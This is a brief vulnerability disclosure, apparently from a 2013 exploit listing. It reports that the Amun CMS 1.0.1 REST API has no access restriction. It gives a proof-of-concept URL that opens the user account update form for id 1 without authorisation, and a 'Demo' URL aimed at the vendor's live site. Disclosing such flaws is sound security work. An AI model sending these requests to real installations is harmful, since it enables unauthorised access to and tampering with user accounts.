Amun CMS 1.0.1 REST API No Access Restriction

Author    : syst3m_f4ult
Homepage  : http://amun-project.org
Vendor    : Amun CMS
Version   : 1.0.1 (probably all versions)
Tested on : Ubuntu 12.04
Date      : 2013-10-11

-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------

Default : http://127.0.0.1/
Exploit : http://127.0.0.1/index.php/api/user/account/form?format=xml&method=update&id=1
Demo    : http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1